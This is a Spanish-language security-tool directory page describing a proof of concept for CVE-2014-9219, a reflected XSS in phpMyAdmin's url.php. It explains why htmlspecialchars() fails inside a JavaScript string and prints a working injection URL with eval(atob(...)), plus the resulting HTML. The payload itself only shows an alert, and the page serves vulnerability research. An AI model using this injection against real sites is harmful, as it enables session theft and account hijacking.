Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2014-9219 — CVE-2014-9219 XSS POC | Kitploit
Herramientas/GitHubGitHub/mohmadhafiz/cve-2014-9219
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubmohmadhafiz/cve-2014-9219

CVE-2014-9219

CVE-2014-9219 XSS POC

Ver Repositorio
hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2014-9219

CVE-2014-9219 XSS POC

Acerca de

La vulnerabilidad es causada por un error de validación de entrada en la función de redirección en url.php en phpMyAdmin 4.2.x anterior a 4.2.13.1 al procesar el parámetro url. Un atacante remoto puede engañar a la víctima para que siga un enlace especialmente diseñado y ejecutar código HTML y script arbitrario en el navegador de la víctima en el contexto de seguridad del sitio web vulnerable.

Versión afectada

phpMyAdmin: 4.2.0 - 4.2.13

Problema

El código vulnerable utiliza htmlspecialchars() para sanitizar el parámetro URL antes de insertarlo en un contexto de cadena de JavaScript:

root@kitploit:~
window.location='" . htmlspecialchars($_GET['url']) . "';

htmlspecialchars() está diseñado para contexto HTML, no para contexto de cadena de JavaScript. No escapa adecuadamente los caracteres que pueden salir de los literales de cadena de JavaScript.

mira el commit

POC

url codificado:

root@kitploit:~
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
Descargar herramienta

url decodificado:

root@kitploit:~
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'

Salida HTML:

root@kitploit:~
<script type='text/javascript'>
            window.onload=function(){
                window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
            }
        </script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.